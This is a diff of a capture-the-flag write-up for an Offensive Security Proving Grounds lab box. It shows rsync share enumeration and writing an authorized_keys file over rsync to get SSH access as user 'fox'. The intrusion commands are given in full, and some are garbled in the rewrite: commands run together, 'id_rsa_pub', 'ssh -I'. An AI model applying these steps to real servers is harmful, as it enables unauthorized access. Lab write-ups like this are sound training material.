Bsal13/Offensive-Security-Proving-Grounds-Boxes/Fail (Intermediate) Linux Box.md

 # Enumeration
 ## Port 873 -Rsync

-#### -Per googling port 873 enumeration I found "hacktricks" website showing to type "nmap -sV --script "rsync-list-modules" -p <PORT> <IP>" to enumerate shares:
+-We discovered the "hacktricks" website when searching for a method to enumerate shares using port 873: "nmap -sV — script “rsync-list-modules” -p [Port] [IP]"

 ![](Images/Pasted%20image%2020221015215909.png)

+- We locate the share fox by typing the following:

-#### -Found share "fox" typing "nmap -sV --script "rsync-list-modules" -p 873 192.168.143.126":
+nmap -sV -script "rsync-list-modules" -p 873 192.168.143.126

 ![](Images/Pasted%20image%2020221015220513.png)
 #RsyncShare

-#### -Per googling port 873 enumeration I found the below web page showing how to list files/directory from rsync server
+- Searching for port 873 enumeration on Google yields the following webpage, which explains how to list files and directories from the rsync server.

 ![](Images/Pasted%20image%2020221015220950.png)

 ![](Images/Pasted%20image%2020221015221123.png)

-#### -Typed "rsync -r 192.168.143.126::fox " and found the below files/directories showing user "fox" home directory and then downloaded all files/directories onto local machine by typing "rsync -av fox@192.168.143.126::fox/ ."
+- After typing "rsync -r 192.168.143.126::fox," we discovered the files and directories below, which displayed the user "fox" home directory.
+We then used "rsync -av fox@192.168.143.126::fox/" to download all of the files and directories to our local system.

 ![](Images/Pasted%20image%2020221015221356.png)

 ![](Images/Pasted%20image%2020221015221635.png)

-#### -Found nothing interesting reading the files
+-After reading the data, we discover nothing intriguing.

-#### -Tested if I can upload files users "fox" home directory by typing "echo "hello world" > testfile.txt" and typing "rsync testfile.txt -r 192.168.143.126::fox" to see if it uploaded to fox's home directory.
-And I found I can:
+- We attempt to upload files to the user’s “fox” home directory by running the following commands: “echo “hello world” > testfile.txt” and “rsync testfile.txt -r 192.168.143.126::fox” to check if the file has been uploaded.

 ![](Images/Pasted%20image%2020221015221837.png)

-#### -The directions how to find out how to do this was found on the previous website showing the following:
+- The previous website provided the following instructions on how to carry out these actions:

 ![](Images/Pasted%20image%2020221015222046.png)

-#### -Googled "port 873 enumeration" and found the following page from hacktricks showing how to copy all files from your  local machine to the rsync server:
+- We search for "port 873 enumeration" on Google and discover the hacktricks page that explains how to copy every file from an rsync server to our local machine:

 ![](Images/Pasted%20image%2020221015222900.png)

-#### Then copied all rsync files to kali machine
+- Next, we transfer every rsync file to our Kali machine.

 ---

 # Exploitation

-#### -Typed the following commands to create an authorized_keys file in fox's home directory so I can log in via SSH session:
+- In order to create an authorized_keys file in Fox's home directory and commence an SSH session, we input the following commands:
--"mkdir fox"
--"cd fox"
--"mkdir .ssh"
--"cd .ssh"
--"touch id_rsa.pub"
+-
+mkdir fox
+cd fox
+mkdir .ssh
+cd .ssh
+touch id_rsa.pub
--"ssh-keygen -t rsa"
+ssh-keygen -t rsa
--[Enter file in which to save the key (/home/kali/.ssh/id_rsa):] "/home/kali/Downloads/ProvingGroundsBoxes/Fail/fox/.ssh/id_rsa.pub"
+[Enter file in which to save the key (/home/kali/.ssh/id_rsa):] "/home/kali/Downloads/ProvingGroundsBoxes/Fail/fox/.ssh/id_rsa.pub"
--[Enter passphrase (empty for no passphrase):] "password" -[Enter same passphrase again:] "password"
+[Enter passphrase (empty for no passphrase):] "password" [Enter same passphrase again:] "password" sudo mv id_rsa_pub authorized_keys cd .. rsync -avp fox/ fox@192.168.120.149::fox/
--"sudo mv id_rsa_pub authorized_keys"
--"cd .."
--"rsync -avp fox/ fox@192.168.120.149::fox/"

-#### -Navigated to directory where the "id_rsa" file was created after running "ssh-keygen -t rsa" and typed "chmod 600" to create the correct permissions for the private ssh key
+- We navigate to the directory where the "id_rsa" file was produced.

-#### -Typed "ssh -I id_rsa fox@192.168.143.126" and typed in "password" for the password and received an ssh session as user fox
+- To set the proper permissions for the SSH key, we type "chmod 600".

+- We enter "ssh -I id_rsa fox@192.168.143.126" to log in.

+- We establish an SSH session as user fox by entering "password" as the password.

 ![](Images/Pasted%20image%2020221016090756.png)

 ---